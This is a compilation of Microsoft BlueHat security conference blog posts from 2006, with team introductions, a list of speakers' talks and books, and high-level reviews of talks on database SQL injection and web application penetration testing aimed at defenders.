BlueHat Hackers?
There have been some misconceptions recently around both security researchers we bring in for Blue Hat, and security consulting companies that also help us make our products. I’ve even seen the phrase “Blue hat hackers” thrown around.
While it was terribly flattering (and somewhat amusing) to the BlueHat team to see the incredible talented consultants working with us to secure our products referred to as BlueHat Hackers, there really is no such thing. Security researchers may choose to self-identify as white hat, grey hat, black hat, or no hat at all, but I wouldn’t even refer to our in-house full time pen-testers as BlueHat Hackers. Though I think the vendors and our full time pen testers all have a pretty good sense of humor and are having fun with this.
Talk reviews coming soon to the blog… Search Engine Hacking by Johnny Long and Database Rootkits by Alexander Kornbrust
The BlueHat team has been getting a lot of questions from both inside and outside of Microsoft asking if we are going to publicly post video or audio recordings of the BlueHat presentations, or if we are going to hoard the BlueHatty goodness and keep the presentation details all to ourselves... A totally valid question since all of our BlueHat presentations from 2005 and 2006 are fantastic and things any developer or IT Pro could benefit from seeing.
BlueHat speakers present at a number of public conferences, many of the speakers have written books, and in some cases speakers are willing to schedule private presentations to interested groups. So while we don’t want to deprive customers of information that could help them improve their enterprise or product security, Microsoft is also respectful of our speaker’s expertise and the business they derive from that. To that end, we are attempting to provide a list of publicly available resources you might reference for additional information.
(speakers – please let me know if I’ve missed something and I’ll update the posting!!)
~Kymberlee
Upcoming Public Presentations & Training (listed in date order)
Caleb Sima - Methodologies and Demos of Web Application Hacks: ISSA Charlotte 3rd Annual Information Security Summit, Charlotte NC, March 23
Vinnie Liu - Bleeding-edge Anti-forensics: InfoSecWorld 2006, Orlando FL, April 3-5
HD Moore - Metasploitation (and a dash of IPS): CanSecWest, Vancouver BC, April 5-7
Halvar Flake - More on Uninitalized Variables: CanSecWest, Vancouver BC, April 5-7
Alex Stamos & Scott Stender - Attacking Web Services: CanSecWest, Vancouver BC, April 5-7
Vinnie Liu - Defeating Forensic Analysis: Computer and Enterprise Investigations Conference 2006 (CEIC), Lake Las Vegas NV, May 3-6
David Litchfield - Breakable: Secure Your Oracle Servers By Breaking Into Them: Black Hat Training, Las Vegas NV, July 29-30 and again July 31-August 1
Kev Dunn - Advanced Database Security Assessment: Black Hat Training, Las Vegas NV, July 29-30 and again July 31-August 1
Halvar Flake - Analyzing Software for Security Vulnerabilities: Black Hat Training, Las Vegas NV, July 31-August 1
Halvar Flake – SABRE Security Training, Frankfurt Germany, October 2006
On Demand Webcasts, Videos, & Presentations
Caleb Sima: http://www.spidynamics.com/spilabs/education/webcasts.html
Caleb Sima: http://www.spidynamics.com/spilabs/education/videos.html
Brett Moore: http://www.security-assessment.com/tech-1.htm
BlueHat speakers present at many conferences worldwide, but Black Hat and ShmooCon are the only conferences we are aware of that offer a public archive of prior conference presentations.
http://www.blackhat.com/html/bh-media-archives/bh-multi-media-archives.html.
http://www.shmoocon.org/schedule.html
*whoops, RECon and HITB also have online archives... Thanks TG for the reminder.
Books
David Litchfield: The Database Hacker's Handbook: Defending Database Servers (ISBN: 0764578014)
David Litchfield: The Shellcoder's Handbook : Discovering and Exploiting Security Holes (ISBN: 0764544683)
David Litchfield: SQL Server Security (ISBN: 0072225157)
Caleb Sima: Hacking Exposed Web Applications, Second Edition (Hacking Exposed) (ISBN: 0072262990)
Johnny Long: Google Hacking for Penetration Testers (ISBN: 1931836361)
Vinnie Liu, Johnny Long: Penetration Tester's Open Source Toolkit (ISBN: 1597490210)
Vinnie Liu: Writing Security Tools and Exploits (ISBN: 1597499978)
Dan Kaminsky: Hack Proofing Your Network 2nd Edition (ISBN: 1928994709)
David Maynor: ISS X-Force: Next Generation Threat Analysis and Prevention (ISBN: 1597490563)
UPDATED MARCH 29, 2006 to add upcoming presentations by Vinnie Liu, change authors listed on Penetration Tester's Open Source Toolkit, and add two more conference archives.
Caleb Sima: Exploiting Web ApplicationsHalvar Flake: BinDiff AnalysisHD Moore: How not to deploy ASP.Net applications & MetasploitAlexander Kornbrust: Database Viruses & Rootkits
Enjoy,Brad Sarsfield
Brad Sarsfield here again. I’d like to share with you my thoughts on David Litchfield’s BlueHatv3 talk. David Litchfield is the Chief Research Scientist at Next Generation Security Software (NGS) and spoke to a 600+ standing room only crowd at Bluehat 3 on March 9th. David took us through his thoughts on the current state of the database security world and talked about his current areas and focus of his research.
David did not discuss specific database vulnerabilities but rather showed the concepts behind subverting the database application logic to attack the database. David talked about SQL injection inside the database and also second order SQL injection inside the database; whereby you store data in the database and at a later time it gets used in a place vulnerable to SQL injection.
David talked through the possible dangers of having system stored procedures and triggers that could be vulnerable to SQL injection. Since triggers execute under the permissions of the owner; if one can find a trigger that is vulnerable to SQL injection the permission boundaries can be crossed and it be used to gain escalation of privileges inside the database.
If you have access to the database and if you have a SQL injection vulnerability in a stored procedure or trigger that runs outside of your permission boundary a malicious user could use the vulnerable SP’s to grant themselves privileges that they are not supposed to have.
A the end of the day
1) Tools are not enough. Your database and application design need to have clear forethought. Tools are a good start but don’t rely on them to catch all of your mistakes. (That's exactly what our own security experts have been telling us)
2) Triggers can be dangerous. Think about how you use them carefully.
3) Even low risk issues should be respected
If you’re interested in David Litchfield’s work I would highly suggest a book that he co-authored titled “The Database Hacker's Handbook: Defending Database Servers” (ISBN: 0764578014)
Over the next few days we’ll all be writing about the BlueHat sessions… Today I’m excited to have a chance to tell you more about the Exploiting Web Applications presentation made by Caleb Sima, CTO and co-founder of SPI Dynamics at BlueHat 3 on March 9th. (Listen to a podcast interview with Caleb here.)
So you've installed all the latest patches, no one opened any malicious attachments, you've got all the right ports shut down, you've got your firewall, anti-virus software and IDS all running and up to date - and you still got hacked. How did it happen?
This presentation walked the audience through a real penetration test of a bank, and showed our engineers just how the hack happens. I’ll be honest, this was a somewhat unusual talk for us to have at BlueHat - it wasn’t about vulnerabilities in a Microsoft product specifically - in fact the demonstration Caleb walked through wasn’t even Microsoft technology based. But seeing how a malicious hacker can use techniques like SQL injection and blind SQL injection to extract your entire database regardless of what vendor’s software you are using was pretty cool. It isn't every day that you get a glimpse into how malicious hackers find vulnerabilities to access data through web applications, and what can be done to better defend that data.
Caleb is a very engaging speaker and the insight he shared on the methodology a web application hacker uses to approach a target was educational and entertaining. He not only demonstrated the basic premise of these techniques and how to manually execute them, but how they can be easily automated with tools – the hacker can go do dinner and come back to a nice report of results. But not only is the exploit is automated, the research to find an attack target can also be automated! In the next part of the presentation Caleb showed how using common search engines a hacker can identify tens of thousands of vulnerable targets (and even narrow those target searches down to the most interesting domains) in just a few minutes.
All data is valuable; the risk of having your web application broken into is not just credit card fraud or identity theft of your customers. There are also real life examples of one business putting a competitor out of business by accessing customer lists, pricing plans, and design schematics to give them an edge.
So how do you protect your data? It isn’t enough to just limit the amount of information in your error messages that may give hackers a roadmap into your database – that doesn’t protect you against blind SQL injection attacks. The majority of web application attacks can be solved by input validation!
Unfortunately, time ran out before Caleb had a chance to get to his last segment – some very early research he is doing on how a hacker could manipulate search engine results to push their website further up in the rankings. The audience (close to 700 engineers) was audibly disappointed, so Caleb offered to come back at the end of the day and present another 20 minutes to cover this topic. And at the end of a full conference day, everyone in the audience stayed late to see this additional content.
And I’ve got to take a moment to thank Caleb for his sporting sense of humor – without warning him, I arranged to air The Code Room – Breaking Into Vegas to the audience over lunch, a couple hours before his BlueHat presentation. This is an educational and entertaining 30 minute video about a casino being hacked through their web application, so it was a perfect addition to the Thursday BlueHat agenda focusing on database and web application security. Why would I have warned Caleb? You won’t find it on imdb, but Caleb is one of the actors in the video, along with several other security luminaries like John Viega, Joel Scambray, and Frank Swiderski. Thanks guys. J
Next talk review coming to the blog… Current Database Vulnerability Research by David Litchfield
The BlueHat blog has been up less than 24 hours, and it was quoted this morning in an article by Robert McMillan on InfoWorld. That article has already hit /. Some of the comments are pretty funny...
I can't wait for the speaker podcasts and channel9 video to go live so people can hear directly from the BlueHat speakers! As soon as they are published, we'll highlight the links here.
Hi, I'm Brad Sarsfield (bradsa!); I’m the SQL guy here. One of the interesting things about me and my team is that I own the ‘slammer’ component in SQL Server, so by that very nature quite a large part of my job description is to ensure (and I quote) “that never … ever … happens again”. So by default that makes me a SQL security guy and I work quite closely within the SQL Server security team.
In my adventures to fulfill my job description I’ve met a lot of brilliant database security researchers like David Litchfield, Kevin Dunn and Alexander Kornburst. I’ve had conversations with these and other researchers that I really wish I could have shared with the 1000 of my SQL Server engineering colleagues. So after a few of the “I wish everyone working on SQL Server could hear this right now!” moments I talked Kymberlee Price and Andrew Cushman into adding another day; thus we added another day focused on SQL, Data and Web application security.
The first day was a condensed set of talks to senior product leadership and executive types. The second day took a SQL, Data and Web application focus while the third day focused in on the Windows Platform.
On the first day, putting around 40 highly technical senior level engineers, architects and executives in a room for a few hours with some of the top security researches in the world was an amazing sight, oh and we did it twice that day (March 8th). It was open and honest discussion about problems specific to Microsoft technologies and also problems that affect our enitre industry. Some of the speakers gave a condensed version of their talk during this session.
Everything was fair game. Hearing senior executives say things like: “I want the people responsible for those features in my office early next week; I want to get to the bottom of this” was at least one measure of success from my point of view for the event. The speakers were quite impressed with the technical depth that our executives have.
Stay tuned as we bring more content online at the BlueHat technet site.
Brad Sarsfield
Microsoft SQL Server
bradsa@microsoft.com
BlueHat 3 just completed last week, and all I can say is WOW. Great speakers. Great presentations. Packed audience. You can read the session abstracts and speaker bios here to see what I'm talking about.
OH! I should introduce myself. Where are my manners? I'm Kymberlee Price, a Security Program Manager at Microsoft. The organizational taxonomy of where I work at Microsoft is kind of crazy* - the short explanation is that I'm in an engineering group that is responsible for product security across Microsoft - both products we have and haven't shipped yet. When I'm not busy planning BlueHat, I do a variety of things to help Microsoft developers and external security researchers connect and learn from each other with the ultimate goal of providing a more secure computing experience for users.
Of course no one person can plan a three day conference on their own - I work with a team of great people who you will also see here on the BlueHat Blog. Over the coming days we'll be posting our reflections on BlueHat 3 as well as photos and links to podcasts and channel9 video from the event. And we sincerely hope that our BlueHat 3 speakers (and BlueHat 1 & 2 speakers) will post their comments to the site as well and share their BlueHat experience with you.
~Kymberlee Price
Security Program ManagerSecurity Engineering & Communications GroupSecurity Technology UnitMicrosoft Corporation
*see what I mean?